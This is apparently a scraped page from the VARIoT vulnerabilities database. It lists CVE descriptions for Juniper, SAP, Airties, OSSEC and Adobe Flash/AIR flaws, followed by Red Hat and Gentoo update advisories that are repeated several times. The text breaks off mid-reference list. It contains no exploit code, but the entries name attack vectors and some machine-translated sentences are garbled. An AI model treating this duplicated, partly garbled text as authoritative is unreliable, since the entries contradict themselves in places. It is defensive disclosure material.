VARIoT IoT vulnerabilities database

Juniper Installer Service (JIS) Client 7.x before 7.4R6 for Windows and Junos Pulse Client before 4.0R6 allows local users to gain privileges via unspecified vectors. Multiple Juniper Junos Products are prone to local privilege-escalation vulnerability. Local attackers can exploit this issue to escalate their access to root privileges

SAP is the world's leading provider of enterprise management software solutions. The SAP Application-Specific Upgrade has an unexplained path traversal vulnerability that allows an attacker to initiate a traversal path attack with a specially crafted request because the program failed to properly filter user input

Cross-site scripting (XSS) vulnerability in top.html in the Airties Air 6372 modem allows remote attackers to inject arbitrary web script or HTML via the productboardtype parameter. AirTies Air is a set-top box device. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Air 6372 is prone to a cross-site scripting vulnerability

host-deny.sh in OSSEC before 2.8.1 writes to temporary files with predictable filenames without verifying ownership, which allows local users to modify access restrictions in hosts.deny and gain root privileges by creating the temporary files before automatic IP blocking is performed. OSSEC is prone to an insecure temporary file-creation vulnerability. An attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application. Other attacks may also be possible. OSSEC 2.8 is vulnerable; other versions may also be affected

Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow remote attackers to bypass the Same Origin Policy via unspecified vectors. An attacker can exploit this issue to bypass certain same-origin policy restrictions, which may aid in further attacks. Security flaws exist in several Adobe products. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:1173-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html Issue date: 2014-09-10 CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21, listed in the References section. Multiple flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0548) All users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 11.2.202.406. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21) 1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0547.html https://www.redhat.com/security/data/cve/CVE-2014-0548.html https://www.redhat.com/security/data/cve/CVE-2014-0549.html https://www.redhat.com/security/data/cve/CVE-2014-0550.html https://www.redhat.com/security/data/cve/CVE-2014-0551.html https://www.redhat.com/security/data/cve/CVE-2014-0552.html https://www.redhat.com/security/data/cve/CVE-2014-0553.html https://www.redhat.com/security/data/cve/CVE-2014-0554.html https://www.redhat.com/security/data/cve/CVE-2014-0555.html https://www.redhat.com/security/data/cve/CVE-2014-0556.html https://www.redhat.com/security/data/cve/CVE-2014-0557.html https://www.redhat.com/security/data/cve/CVE-2014-0559.html https://access.redhat.com/security/updates/classification/#critical http://helpx.adobe.com/security/products/flash-player/apsb14-21.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U PAXT7xPKbEDLocPPmOJo7t8= =d7aB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could possibly execute arbitrary code with the privileges of the process or bypass security restrictions. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406" References ========== [ 1 ] CVE-2014-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547 [ 2 ] CVE-2014-0548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548 [ 3 ] CVE-2014-0549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549 [ 4 ] CVE-2014-0550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550 [ 5 ] CVE-2014-0551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551 [ 6 ] CVE-2014-0552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552 [ 7 ] CVE-2014-0553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553 [ 8 ] CVE-2014-0554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554 [ 9 ] CVE-2014-0555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555 [ 10 ] CVE-2014-0556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556 [ 11 ] CVE-2014-0557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557 [ 12 ] CVE-2014-0559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201409-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0547, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, and CVE-2014-0555. This vulnerability CVE-2014-0547 , CVE-2014-0550 , CVE-2014-0551 , CVE-2014-0552 and CVE-2014-0555 Is a different vulnerability.An attacker could execute arbitrary code or cause a denial of service ( Memory corruption ) There is a possibility of being put into a state. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Security flaws exist in several Adobe products. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:1173-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html Issue date: 2014-09-10 CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21, listed in the References section. Multiple flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556, CVE-2014-0557, CVE-2014-0559) A flaw in flash-plugin could allow an attacker to bypass the same-origin policy. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21) 1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0547.html https://www.redhat.com/security/data/cve/CVE-2014-0548.html https://www.redhat.com/security/data/cve/CVE-2014-0549.html https://www.redhat.com/security/data/cve/CVE-2014-0550.html https://www.redhat.com/security/data/cve/CVE-2014-0551.html https://www.redhat.com/security/data/cve/CVE-2014-0552.html https://www.redhat.com/security/data/cve/CVE-2014-0553.html https://www.redhat.com/security/data/cve/CVE-2014-0554.html https://www.redhat.com/security/data/cve/CVE-2014-0555.html https://www.redhat.com/security/data/cve/CVE-2014-0556.html https://www.redhat.com/security/data/cve/CVE-2014-0557.html https://www.redhat.com/security/data/cve/CVE-2014-0559.html https://access.redhat.com/security/updates/classification/#critical http://helpx.adobe.com/security/products/flash-player/apsb14-21.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U PAXT7xPKbEDLocPPmOJo7t8= =d7aB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406" References ========== [ 1 ] CVE-2014-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547 [ 2 ] CVE-2014-0548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548 [ 3 ] CVE-2014-0549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549 [ 4 ] CVE-2014-0550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550 [ 5 ] CVE-2014-0551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551 [ 6 ] CVE-2014-0552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552 [ 7 ] CVE-2014-0553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553 [ 8 ] CVE-2014-0554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554 [ 9 ] CVE-2014-0555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555 [ 10 ] CVE-2014-0556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556 [ 11 ] CVE-2014-0557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557 [ 12 ] CVE-2014-0559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201409-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0547, CVE-2014-0549, CVE-2014-0551, CVE-2014-0552, and CVE-2014-0555. This vulnerability CVE-2014-0547 , CVE-2014-0549 , CVE-2014-0551 , CVE-2014-0552 and CVE-2014-0555 Is a different vulnerability.An attacker could execute arbitrary code or cause a denial of service ( Memory corruption ) There is a possibility of being put into a state. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition. Security flaws exist in several Adobe products. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:1173-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html Issue date: 2014-09-10 CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21, listed in the References section. Multiple flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556, CVE-2014-0557, CVE-2014-0559) A flaw in flash-plugin could allow an attacker to bypass the same-origin policy. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21) 1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0547.html https://www.redhat.com/security/data/cve/CVE-2014-0548.html https://www.redhat.com/security/data/cve/CVE-2014-0549.html https://www.redhat.com/security/data/cve/CVE-2014-0550.html https://www.redhat.com/security/data/cve/CVE-2014-0551.html https://www.redhat.com/security/data/cve/CVE-2014-0552.html https://www.redhat.com/security/data/cve/CVE-2014-0553.html https://www.redhat.com/security/data/cve/CVE-2014-0554.html https://www.redhat.com/security/data/cve/CVE-2014-0555.html https://www.redhat.com/security/data/cve/CVE-2014-0556.html https://www.redhat.com/security/data/cve/CVE-2014-0557.html https://www.redhat.com/security/data/cve/CVE-2014-0559.html https://access.redhat.com/security/updates/classification/#critical http://helpx.adobe.com/security/products/flash-player/apsb14-21.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U PAXT7xPKbEDLocPPmOJo7t8= =d7aB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406" References ========== [ 1 ] CVE-2014-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547 [ 2 ] CVE-2014-0548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548 [ 3 ] CVE-2014-0549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549 [ 4 ] CVE-2014-0550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550 [ 5 ] CVE-2014-0551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551 [ 6 ] CVE-2014-0552 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0552 [ 7 ] CVE-2014-0553 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0553 [ 8 ] CVE-2014-0554 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0554 [ 9 ] CVE-2014-0555 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0555 [ 10 ] CVE-2014-0556 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0556 [ 11 ] CVE-2014-0557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0557 [ 12 ] CVE-2014-0559 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0559 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201409-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5

Use-after-free vulnerability in Adobe Flash Player before 13.0.0.244 and 14.x and 15.x before 15.0.0.152 on Windows and OS X and before 11.2.202.406 on Linux, Adobe AIR before 15.0.0.249 on Windows and OS X and before 15.0.0.252 on Android, Adobe AIR SDK before 15.0.0.249, and Adobe AIR SDK & Compiler before 15.0.0.249 allows attackers to execute arbitrary code via unspecified vectors. Supplementary information : CWE Vulnerability type by CWE-416: Use After Free ( Use of freed memory ) Has been identified. http://cwe.mitre.org/data/definitions/416.htmlAn attacker could execute arbitrary code. Failed exploit attempts will likely cause a denial-of-service condition. A use-after-free vulnerability exists in several Adobe products. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:1173-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1173.html Issue date: 2014-09-10 CVE Names: CVE-2014-0547 CVE-2014-0548 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-21, listed in the References section. Multiple flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0547, CVE-2014-0549, CVE-2014-0550, CVE-2014-0551, CVE-2014-0552, CVE-2014-0553, CVE-2014-0554, CVE-2014-0555, CVE-2014-0556, CVE-2014-0557, CVE-2014-0559) A flaw in flash-plugin could allow an attacker to bypass the same-origin policy. (CVE-2014-0548) All users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 11.2.202.406. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1139847 - CVE-2014-0547 CVE-2014-0549 CVE-2014-0550 CVE-2014-0551 CVE-2014-0552 CVE-2014-0553 CVE-2014-0554 CVE-2014-0555 CVE-2014-0556 CVE-2014-0557 CVE-2014-0559 flash-plugin: multiple code execution or security bypass flaws (APSB14-21) 1139852 - CVE-2014-0548 flash-plugin: same origin policy bypass (APSB14-21) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.406-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.406-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.406-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.406-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0547.html https://www.redhat.com/security/data/cve/CVE-2014-0548.html https://www.redhat.com/security/data/cve/CVE-2014-0549.html https://www.redhat.com/security/data/cve/CVE-2014-0550.html https://www.redhat.com/security/data/cve/CVE-2014-0551.html https://www.redhat.com/security/data/cve/CVE-2014-0552.html https://www.redhat.com/security/data/cve/CVE-2014-0553.html https://www.redhat.com/security/data/cve/CVE-2014-0554.html https://www.redhat.com/security/data/cve/CVE-2014-0555.html https://www.redhat.com/security/data/cve/CVE-2014-0556.html https://www.redhat.com/security/data/cve/CVE-2014-0557.html https://www.redhat.com/security/data/cve/CVE-2014-0559.html https://access.redhat.com/security/updates/classification/#critical http://helpx.adobe.com/security/products/flash-player/apsb14-21.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFUEFUvXlSAg2UNWIIRAldrAKC3dXXdfqa7MBvNVt/I8s999AHuiwCgs34U PAXT7xPKbEDLocPPmOJo7t8= =d7aB -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.406" References ========== [ 1 ] CVE-2014-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0547 [ 2 ] CVE-2014-0548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0548 [ 3 ] CVE-2014-0549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0549 [ 4 ] CVE-2014-0550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0550 [ 5 ] CVE-2014-0551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0551 [ 6 ] 